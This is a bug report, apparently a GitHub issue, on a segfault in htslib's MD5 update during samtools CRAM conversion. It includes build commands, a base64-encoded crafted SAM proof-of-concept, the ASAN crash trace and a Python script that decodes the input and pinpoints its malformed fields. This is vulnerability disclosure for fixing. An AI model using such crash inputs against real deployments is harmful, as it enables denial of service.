segfault during hts_md5_update #1692

@OctavioGalland

Description

Summary

Segfault in hts_md5_update during parsing of a crafted SAM/FASTA file pair.

Environment

Built using LLVM 14 with ASAN on Ubuntu 22.04

How to reproduce

Build with ASAN on latest commit like so:

git clone --recursive https://github.com/samtools/htslib
cd htslib
autoreconf -i
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address -g" ./configure
make -j$(nproc)

git clone --recursive https://github.com/samtools/samtools
cd samtools
autoheader
autoconf -Wno-syntax
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" CXXFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" LDFLAGS="-fsanitize=address -g -L$(pwd)/../htslib" ./configure
make -j$(nproc)

Within the samtools folder, get the poc file and reproduce with:

echo -ne "QFNRCVNOOmMxCUxOOjEwCnMwCTAJYzEJMTAwMDAwMDAwMDAwCTAJKjAJQTFDQ0dDR0dUVDEJMgkw
CTENTQkqCTAqKkNDQ0NYUEP/ZEJDSEMqKgoqUQlTATpjMQlMTjoxMApzMAkwCWMxCTEJMAkqMAlB
MUNDR0NHR1RUGQkyCTAJMQ1NCSoKczAJMAljMQkxCTAJKjAJQTFDQ0dDR0dUVDEJMgkwCTFRCVNO
OmMxCUxOOjEwCnMwCTAJYzEJMQkwCSowCUExQ0NHQ0dHVFQZCTIJMCoqCg==" | base64 -d > poc
./samtools view -C -T ../htslib/test/c2.fa poc

Which on my setup outputs:

[W::cram_get_ref] Reference file given, but ref 'c1' not present
[W::cram_get_ref] Failed to populate reference for id 0
[W::cram_write_SAM_hdr] No M5 tags present and could not find reference
[W::cram_write_SAM_hdr] Enabling embed_ref=2 option
[W::cram_write_SAM_hdr] NOTE: the CRAM file will be bigger than using an external reference
CRAM-�\��vvr@SQ	SN:c1	LN:10
@PG	ID:samtools	PN:samtools	VN:1.18-21-g528e1b2	CL:./samtools view -C -T ../htslib/test/c2.fa poc
�	�??}�Y�[W::sam_parse1] mapped query must have a CIGAR; treated as unmapped
[W::sam_parse1] unrecognized mate reference name "A1CCGCGGTT1"; treated as unmapped
[W::sam_read1_sam] Parse error at line 3
AddressSanitizer:DEADLYSIGNAL
=================================================================
==11502==ERROR: AddressSanitizer: SEGV on unknown address 0x61a700001980 (pc 0x7f43074c49bf bp 0x7ffca087c6c0 sp 0x7ffca087be88 T0)
==11502==The signal is caused by a READ memory access.
    #0 0x7f43074c49bf  string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:370
    #1 0x559b356add81 in __asan_memcpy (/home/octavio/samtools/samtools+0x132d81) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #2 0x559b359c13e9 in hts_md5_update /home/octavio/htslib/md5.c:268:2
    #3 0x559b35a7fcbd in cram_encode_container /home/octavio/htslib/cram/cram_encode.c:2041:17
    #4 0x559b35aef96c in cram_flush_container /home/octavio/htslib/cram/cram_io.c:4128:14
    #5 0x559b35af0795 in cram_flush_container_mt /home/octavio/htslib/cram/cram_io.c:4280:16
    #6 0x559b35afb742 in cram_flush /home/octavio/htslib/cram/cram_io.c:5431:19
    #7 0x559b3598a2e7 in hts_flush /home/octavio/htslib/hts.c:1667:16
    #8 0x559b35903084 in vprint_error_core /home/octavio/samtools/sam_utils.c:48:26
    #9 0x559b3590345c in print_error_errno /home/octavio/samtools/sam_utils.c:71:5
    #10 0x559b3570c472 in stream_view /home/octavio/samtools/sam_view.c:762:9
    #11 0x559b35707be8 in main_samview /home/octavio/samtools/sam_view.c:1363:15
    #12 0x559b35786eed in main /home/octavio/samtools/bamtk.c:244:55
    #13 0x7f4307429d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #14 0x7f4307429e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #15 0x559b3562bb24 in _start (/home/octavio/samtools/samtools+0xb0b24) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:370 
==11502==ABORTING
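As an added triage aid (not code from the issue, htslib or samtools), the script below decodes the posted PoC and reports which mandatory SAM fields in each record fail basic format checks, so the warnings and the "Parse error at line 3" in the output above can be matched to concrete bytes before the input ever reaches the CRAM encoder; it assumes only the SAM mandatory-field grammar (11 tab-separated fields, 32-bit POS, spec CIGAR syntax, RNAME/RNEXT resolvable against @SQ lines).

```python
import base64
import re

# The PoC bytes exactly as posted in the issue (base64 copied from the report).
POC_B64 = (
    "QFNRCVNOOmMxCUxOOjEwCnMwCTAJYzEJMTAwMDAwMDAwMDAwCTAJKjAJQTFDQ0dDR0dUVDEJMgkw"
    "CTENTQkqCTAqKkNDQ0NYUEP/ZEJDSEMqKgoqUQlTATpjMQlMTjoxMApzMAkwCWMxCTEJMAkqMAlB"
    "MUNDR0NHR1RUGQkyCTAJMQ1NCSoKczAJMAljMQkxCTAJKjAJQTFDQ0dDR0dUVDEJMgkwCTFRCVNO"
    "OmMxCUxOOjEwCnMwCTAJYzEJMQkwCSowCUExQ0NHQ0dHVFQZCTIJMCoqCg=="
)
CIGAR_RE = re.compile(rb"^(\*|([0-9]+[MIDNSHP=X])+)$")  # SAM spec CIGAR grammar
INT32_MAX = 2**31 - 1  # SAM POS is a 32-bit signed field


def decode_poc() -> bytes:
    return base64.b64decode(POC_B64)


def check_sam(data: bytes) -> dict:
    """Map 1-based line number -> problems for each SAM record that fails basic
    mandatory-field checks; header lines count so numbers match samtools'."""
    refs, problems = set(), {}
    for no, line in enumerate(data.split(b"\n"), start=1):
        if not line:
            continue
        f = line.split(b"\t")
        if line.startswith(b"@"):
            if f[0] == b"@SQ":  # collect reference names for RNAME/RNEXT checks
                refs.update(x[3:] for x in f[1:] if x.startswith(b"SN:"))
            continue
        errs = []
        if len(f) < 11:
            errs.append(f"only {len(f)} of 11 mandatory fields")
        else:
            flag, rname, pos, cigar, rnext = f[1], f[2], f[3], f[5], f[6]
            if not flag.isdigit():
                errs.append(f"FLAG not numeric: {flag!r}")
            if rname != b"*" and rname not in refs:
                errs.append(f"RNAME not in header: {rname!r}")
            if not pos.isdigit() or int(pos) > INT32_MAX:
                errs.append(f"POS out of range: {pos!r}")
            if not CIGAR_RE.match(cigar):
                errs.append(f"CIGAR malformed: {cigar!r}")
            elif cigar == b"*" and rname != b"*" and flag.isdigit() and not int(flag) & 4:
                errs.append("mapped query has no CIGAR")
            if rnext not in (b"*", b"=") and rnext not in refs:
                errs.append(f"RNEXT not in header: {rnext!r}")
        if errs:
            problems[no] = errs
    return problems
```

Running `check_sam(decode_poc())` flags record line 2 for an out-of-range POS, a malformed CIGAR and the unknown mate reference "A1CCGCGGTT1" (the two sam_parse1 warnings), and line 3 for having only three fields (the parse error after which the crash occurs during the flush).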